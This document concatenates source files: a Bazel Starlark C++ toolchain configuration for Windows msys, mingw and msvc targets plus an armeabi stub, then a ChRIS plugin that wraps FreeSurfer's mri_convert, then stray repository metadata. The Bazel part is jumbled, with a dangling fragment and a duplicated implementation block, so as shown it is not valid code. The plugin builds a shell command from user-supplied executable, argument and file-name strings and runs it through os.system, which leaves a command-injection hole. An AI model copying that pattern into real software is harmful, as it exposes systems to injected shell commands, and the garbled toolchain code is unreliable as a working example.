env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/usr/bin"),
],
),
],
)
windows_features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
]
supports_pic_feature = feature(
name = "supports_pic",
enabled = True,
)
supports_start_end_lib_feature = feature(
name = "supports_start_end_lib",
enabled = True,
)
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = compile_flags)] if compile_flags else []),
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = dbg_compile_flags)] if dbg_compile_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = opt_compile_flags)] if opt_compile_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = cxx_flags)] if cxx_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = link_flags)] if link_flags else []),
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = opt_link_flags)] if opt_link_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
],
)
dbg_feature = feature(name = "dbg")
opt_feature = feature(name = "opt")
sysroot_feature = feature(
name = "sysroot",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["--sysroot=%{sysroot}"],
expand_if_available = "sysroot",
),
],
),
],
)
fdo_optimize_feature = feature(
name = "fdo_optimize",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [
flag_group(
flags = [
"-fprofile-use=%{fdo_profile_path}",
"-fprofile-correction",
],
expand_if_available = "fdo_profile_path",
),
],
),
],
provides = ["profile"],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
user_compile_flags_feature = feature(
name = "user_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [
flag_group(
flags = ["%{user_compile_flags}"],
iterate_over = "user_compile_flags",
expand_if_available = "user_compile_flags",
),
],
),
],
)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = unfiltered_compile_flags)] if unfiltered_compile_flags else []),
),
],
)
features = windows_features + [
supports_pic_feature,
default_compile_flags_feature,
default_link_flags_feature,
fdo_optimize_feature,
supports_dynamic_linker_feature,
dbg_feature,
opt_feature,
user_compile_flags_feature,
sysroot_feature,
unfiltered_compile_flags_feature,
]
artifact_name_patterns = [
artifact_name_pattern(category_name = "executable", prefix = "", extension = ".exe"),
]
make_variables = []
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = "msys_x64",
host_system_name = "local",
target_system_name = "local",
target_cpu = "x64_windows",
target_libc = "msys",
compiler = "msys-gcc",
abi_version = "local",
abi_libc_version = "local",
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = "",
cc_target_os = None,
)
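# Rule entry point: `cpu` selects the implementation above and `compiler`
# disambiguates the two x64_windows variants.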
cc_toolchain_config = rule(
implementation = _impl,
attrs = {
"cpu": attr.string(mandatory = True),
"compiler": attr.string(),
},
provides = [CcToolchainConfigInfo],
)
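# Example usage (a minimal sketch): the rule is instantiated from a BUILD
# file; the file and target names below are illustrative, not taken from
# this repository.
#
#   load(":cc_toolchain_config.bzl", "cc_toolchain_config")
#
#   cc_toolchain_config(
#       name = "msvc_x64_config",
#       cpu = "x64_windows",
#       compiler = "msvc-cl",
#   )
#
#   cc_toolchain_config(
#       name = "armeabi_v7a_config",
#       cpu = "armeabi-v7a",
#   )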
),
artifact_name_pattern(
category_name = "static_library",
prefix = "",
extension = ".lib",
),
artifact_name_pattern(
category_name = "alwayslink_static_library",
prefix = "",
extension = ".lo.lib",
),
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
artifact_name_pattern(
category_name = "dynamic_library",
prefix = "",
extension = ".dll",
),
artifact_name_pattern(
category_name = "interface_library",
prefix = "",
extension = ".if.lib",
),
]
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/lib.exe"),
tool_path(name = "ml", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe"),
tool_path(name = "cpp", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcc", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcov", path = "wrapper/bin/msvc_nop.bat"),
tool_path(name = "ld", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe"),
tool_path(name = "nm", path = "wrapper/bin/msvc_nop.bat"),
tool_path(
name = "objcopy",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "objdump",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "strip",
path = "wrapper/bin/msvc_nop.bat",
),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = None,
)
def _windows_msys_mingw_impl(ctx):
toolchain_identifier = "msys_x64_mingw"
host_system_name = "local"
target_system_name = "local"
target_cpu = "x64_windows"
target_libc = "mingw"
compiler = "mingw-gcc"
abi_version = "local"
abi_libc_version = "local"
cc_target_os = None
builtin_sysroot = None
action_configs = []
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/mingw64/bin"),
],
),
],
)
msys_mingw_flags = [
"-std=gnu++0x",
]
msys_mingw_link_flags = [
"-lstdc++",
]
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = msys_mingw_flags)] if msys_mingw_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = msys_mingw_link_flags)] if msys_mingw_link_flags else []),
),
],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
default_compile_flags_feature,
default_link_flags_feature,
supports_dynamic_linker_feature,
]
cxx_builtin_include_directories = [
"C:\\botcode\\w",
"c:/tools/msys64/mingw64/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
artifact_name_patterns = [
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
]
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/mingw64/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/mingw64/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/mingw64/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/mingw64/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/mingw64/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/mingw64/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/mingw64/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/mingw64/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/mingw64/bin/strip"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
def _armeabi_impl(ctx):
toolchain_identifier = "stub_armeabi-v7a"
host_system_name = "armeabi-v7a"
target_system_name = "armeabi-v7a"
target_cpu = "armeabi-v7a"
target_libc = "armeabi-v7a"
compiler = "compiler"
abi_version = "armeabi-v7a"
abi_libc_version = "armeabi-v7a"
cc_target_os = None
builtin_sysroot = None
action_configs = []
supports_pic_feature = feature(name = "supports_pic", enabled = True)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [supports_dynamic_linker_feature, supports_pic_feature]
cxx_builtin_include_directories = [
"C:\\botcode\\w",
]
artifact_name_patterns = []
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "/bin/false"),
tool_path(name = "compat-ld", path = "/bin/false"),
tool_path(name = "cpp", path = "/bin/false"),
tool_path(name = "dwp", path = "/bin/false"),
tool_path(name = "gcc", path = "/bin/false"),
tool_path(name = "gcov", path = "/bin/false"),
tool_path(name = "ld", path = "/bin/false"),
tool_path(name = "nm", path = "/bin/false"),
tool_path(name = "objcopy", path = "/bin/false"),
tool_path(name = "objdump", path = "/bin/false"),
tool_path(name = "strip", path = "/bin/false"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
def _impl(ctx):
if ctx.attr.cpu == "armeabi-v7a":
return _armeabi_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "msvc-cl":
return _windows_msvc_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "mingw-gcc":
return _windows_msys_mingw_impl(ctx)
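    # Fall-through case (descriptive note, not in the original file): none of
    # the branches above returned, so the remainder of _impl builds the default
    # msys_x64 (msys-gcc) toolchain config returned at the bottom of this function.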
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/usr/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/usr/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/usr/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/usr/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/usr/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/usr/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/usr/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/usr/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/usr/bin/strip"),
]
cxx_builtin_include_directories = [
"C:\\botcode\\w",
"c:/tools/msys64/usr/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
action_configs = []
compile_flags = [
]
dbg_compile_flags = [
]
opt_compile_flags = [
]
cxx_flags = [
"-std=gnu++0x",
]
link_flags = [
"-lstdc++",
]
opt_link_flags = [
]
unfiltered_compile_flags = [
]
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/usr/bin"),
],
),
],
)
windows_features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
]
supports_pic_feature = feature(
name = "supports_pic",
enabled = True,
)
supports_start_end_lib_feature = feature(
name = "supports_start_end_lib",
enabled = True,
)
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = compile_flags)] if compile_flags else []),
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = dbg_compile_flags)] if dbg_compile_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = opt_compile_flags)] if opt_compile_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = cxx_flags)] if cxx_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = link_flags)] if link_flags else []),
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = opt_link_flags)] if opt_link_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
],
)
dbg_feature = feature(name = "dbg")
opt_feature = feature(name = "opt")
sysroot_feature = feature(
name = "sysroot",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["--sysroot=%{sysroot}"],
expand_if_available = "sysroot",
),
],
),
],
)
fdo_optimize_feature = feature(
name = "fdo_optimize",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [
flag_group(
flags = [
"-fprofile-use=%{fdo_profile_path}",
"-fprofile-correction",
],
expand_if_available = "fdo_profile_path",
),
],
),
],
provides = ["profile"],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
user_compile_flags_feature = feature(
name = "user_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [
flag_group(
flags = ["%{user_compile_flags}"],
iterate_over = "user_compile_flags",
expand_if_available = "user_compile_flags",
),
],
),
],
)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = unfiltered_compile_flags)] if unfiltered_compile_flags else []),
),
],
)
features = windows_features + [
supports_pic_feature,
default_compile_flags_feature,
default_link_flags_feature,
fdo_optimize_feature,
supports_dynamic_linker_feature,
dbg_feature,
opt_feature,
user_compile_flags_feature,
sysroot_feature,
unfiltered_compile_flags_feature,
]
artifact_name_patterns = [
artifact_name_pattern(category_name = "executable", prefix = "", extension = ".exe"),
]
make_variables = []
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = "msys_x64",
host_system_name = "local",
target_system_name = "local",
target_cpu = "x64_windows",
target_libc = "msys",
compiler = "msys-gcc",
abi_version = "local",
abi_libc_version = "local",
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = "",
cc_target_os = None,
)
cc_toolchain_config = rule(
implementation = _impl,
attrs = {
"cpu": attr.string(mandatory = True),
"compiler": attr.string(),
},
provides = [CcToolchainConfigInfo],
)
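# A minimal usage sketch of the rule above (an assumption, not part of this
# file): the rule would typically be exported from a .bzl file next to the
# BUILD file. The file name "cc_toolchain_config.bzl" and the target name
# "msvc_cl_config" are hypothetical, chosen so that the attrs hit the
# _windows_msvc_impl branch of _impl:
#
# load(":cc_toolchain_config.bzl", "cc_toolchain_config")
#
# cc_toolchain_config(
#     name = "msvc_cl_config",
#     cpu = "x64_windows",
#     compiler = "msvc-cl",
# )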
# ---- file: mri_convert_ppc64/mri_convert_ppc64.py | repo: quinnyyy/pl-mri_convert_ppc64 | license: MIT ----
#!/usr/bin/env python
#
# mri_convert_ppc64 ds ChRIS plugin app
#
# (c) 2016-2019 Fetal-Neonatal Neuroimaging & Developmental Science Center
# Boston Children's Hospital
#
# http://childrenshospital.org/FNNDSC/
# dev@babyMRI.org
#
import os
import sys
sys.path.append(os.path.dirname(__file__))
# import the Chris app superclass
from chrisapp.base import ChrisApp
Gstr_title = """
_ _ ____ ___
(_) | | / ___| / |
_ __ ___ _ __ _ ___ ___ _ ____ _____ _ __| |_ _ __ _ __ ___/ /___ / /| |
| '_ ` _ \| '__| | / __/ _ \| '_ \ \ / / _ \ '__| __| | '_ \| '_ \ / __| ___ \/ /_| |
| | | | | | | | || (_| (_) | | | \ V / __/ | | |_ | |_) | |_) | (__| \_/ |\___ |
|_| |_| |_|_| |_| \___\___/|_| |_|\_/ \___|_| \__| | .__/| .__/ \___\_____/ |_/
______ ______| | | |
|______| |______|_| |_|
"""
Gstr_synopsis = """
NAME
mri_convert_ppc64.py
SYNOPSIS
python mri_convert_ppc64.py \\
[-h] [--help] \\
[--json] \\
[--man] \\
[--meta] \\
[--savejson <DIR>] \\
[-v <level>] [--verbosity <level>] \\
[--version] \\
[--inputFile <inputFile>] \\
[--outputFile <outputFile>] \\
[--executable <executable>] \\
[--execArgs <execArgs>] \\
<inputDir> \\
<outputDir>
BRIEF EXAMPLE
* Bare bones execution
mkdir in out && chmod 777 out
python mri_convert_ppc64.py \\
in out
DESCRIPTION
`mri_convert_ppc64.py` calls an underlying executable
(typically 'mri_convert') and passes it an input and output spec.
ARGS
[--inputFile <inputFile>]
The input file, relative to <inputDir>.
[--outputFile <outputFile>]
        The output file, relative to <outputDir>.
[--executable <executable>]
The actual executable to run.
[--execArgs <execArgs>]
Additional executable-specific command line args.
[-h] [--help]
If specified, show help message and exit.
[--json]
If specified, show json representation of app and exit.
[--man]
If specified, print (this) man page and exit.
[--meta]
If specified, print plugin meta data and exit.
[--savejson <DIR>]
If specified, save json representation file to DIR and exit.
[-v <level>] [--verbosity <level>]
Verbosity level for app. Not used currently.
[--version]
If specified, print version number and exit.
"""
class Mri_convert_ppc64(ChrisApp):
"""
    This calls a pre-built PPC64 'mri_convert' that is housed in a base container.
"""
AUTHORS = 'BU-2019-Power9 (dev@babyMRI.org)'
SELFPATH = os.path.dirname(os.path.abspath(__file__))
SELFEXEC = os.path.basename(__file__)
EXECSHELL = 'python3'
TITLE = 'A PowerPPC plugin to run the FreeSurfer mri_convert'
CATEGORY = ''
TYPE = 'ds'
DESCRIPTION = 'This calls a pre-built PPC64 mri_convert that is housed in a base container.'
DOCUMENTATION = 'http://wiki'
VERSION = '0.1'
ICON = '' # url of an icon image
LICENSE = 'Opensource (MIT)'
MAX_NUMBER_OF_WORKERS = 1 # Override with integer value
MIN_NUMBER_OF_WORKERS = 1 # Override with integer value
MAX_CPU_LIMIT = '' # Override with millicore value as string, e.g. '2000m'
MIN_CPU_LIMIT = '' # Override with millicore value as string, e.g. '2000m'
MAX_MEMORY_LIMIT = '' # Override with string, e.g. '1Gi', '2000Mi'
MIN_MEMORY_LIMIT = '' # Override with string, e.g. '1Gi', '2000Mi'
MIN_GPU_LIMIT = 0 # Override with the minimum number of GPUs, as an integer, for your plugin
MAX_GPU_LIMIT = 0 # Override with the maximum number of GPUs, as an integer, for your plugin
# Use this dictionary structure to provide key-value output descriptive information
# that may be useful for the next downstream plugin. For example:
#
# {
# "finalOutputFile": "final/file.out",
# "viewer": "genericTextViewer",
# }
#
# The above dictionary is saved when plugin is called with a ``--saveoutputmeta``
# flag. Note also that all file paths are relative to the system specified
# output directory.
OUTPUT_META_DICT = {}
def define_parameters(self):
"""
Define the CLI arguments accepted by this plugin app.
Use self.add_argument to specify a new app argument.
"""
self.add_argument('--executable',
dest = 'executable',
type = str,
optional = True,
help = 'the conversion program to use',
default = '/usr/bin/mri_convert')
self.add_argument('--inputFile',
dest = 'inputFile',
type = str,
optional = True,
help = 'the input file',
default = '')
self.add_argument('--outputFile',
dest = 'outputFile',
type = str,
optional = True,
help = 'the output file',
default = '')
self.add_argument('--execArgs',
dest = 'execArgs',
type = str,
optional = True,
                          help = 'additional arguments for the chosen executable',
default = '')
def run(self, options):
"""
Define the code to be run by this plugin app.
"""
if not len(options.inputFile):
print("ERROR: No input file has been specified!")
print("You must specify an input file relative to the input directory.")
sys.exit(1)
if not len(options.outputFile):
print("ERROR: No output file has been specified!")
print("You must specicy an output file relative to the output directory.")
sys.exit(1)
str_cmd = '%s %s %s/%s %s/%s' % ( options.executable,
options.execArgs,
options.inputdir,
options.inputFile,
options.outputdir,
options.outputFile)
os.system(str_cmd)
def show_man_page(self):
"""
Print the app's man page.
"""
print(Gstr_title)
print(Gstr_synopsis)
# ENTRYPOINT
if __name__ == "__main__":
chris_app = Mri_convert_ppc64()
chris_app.launch()
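# Design note (a sketch, not part of the original plugin): run() interpolates
# user-supplied paths into a shell string for os.system, so names containing
# spaces or shell metacharacters would be mis-parsed. A safer equivalent,
# assuming the same options object, could pass an argv list instead:
#
# import subprocess
# argv = [options.executable,
#         *options.execArgs.split(),
#         os.path.join(options.inputdir, options.inputFile),
#         os.path.join(options.outputdir, options.outputFile)]
# subprocess.run(argv, check=True)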
790ddf0a84ca9a769e99f0de79a3d0d263813d02
| 1,100
|
py
|
Python
|
python/ecs/cluster/app.py
|
